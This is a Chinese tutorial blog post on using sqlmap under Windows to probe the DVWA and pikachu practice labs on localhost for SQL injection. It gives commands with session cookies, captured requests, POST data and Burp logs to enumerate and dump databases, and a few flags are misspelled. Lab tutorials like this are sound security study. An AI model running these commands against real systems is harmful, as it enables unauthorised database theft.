window下使用sqlmap探测sql注入漏洞

window下使用sqlmap探测sql注入漏洞

sql注入:攻击者用非法的参数向服务端执行数据,服务端没有对输入进行校验就直接执行了攻击者输入的非法操作,从而产生sql注入

在python文件夹中放入sqlmap文件夹 后进入cmd 找到文件夹后执行python sqlmap.py
这里对DVWA靶场进行操作

Cookie,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据

  1. 需要登录才能进行操作的网站查找sql注入漏洞。必须获取到cookie值

在这里插入图片描述
或者bp抓包 get类型
在这里插入图片描述

  python sqlmap.py  -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=&Submit=Submit#"   --cookie="security=low; PHPSESSID=cu09mt6qi08gfq0tjf1f37ibb3"

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
有四种类型注入
dump 数据库中数据表中数据: --dump-all

  python  sqlmap.py    -u  "url" --cookie=""         --dbs
   python  sqlmap.py    -u  "url" --cookie=""         --dump                                      
python  sqlmap.py    -u  "url" --cookie=""      -talbes                   所有数据库以及里面的表        
python  sqlmap.py    -u  "url" --cookie=""     -D 数据库名   -tables                     当前数据库以及里面的表      
python  sqlmap.py    -u  "url" --cookie=""     -D 数据库名   -T  表名   -columns     爆出字段
python  sqlmap.py    -u  "url" --cookie=""     -D 数据库名   -T  表名   -C 字段1,字段2  -dump   爆出字段对应的明文

2. 直接抓包 ,生成txt文本直接sql跑

在这里插入图片描述
在这里插入图片描述

  python  sqlmap.py   -r  1.txt   --dbs     

3. post类型的包

在这里插入图片描述

python  sqlmap.py  -u "http://127.0.0.1/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" --dbs  --level 3 --risk 3 --batch

或者直接放到txt里

3. 批量抓包 跑sql

在这里插入图片描述
生成的burp.log和sqlmap.py 放在同一目录
然后就去抓包

抓包完 log 就记录了数据
然后开始跑

python  sqlmap.py  -l  burp.log --batch -smart     --level  3  --risk  3

总结,有登录界面先,就抓包拿cookie 然后get类型就cookie=“”,POST类型就data=“id”,或者直接全部丢到txt里跑,配合burp的抓包日志批量跑也可

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值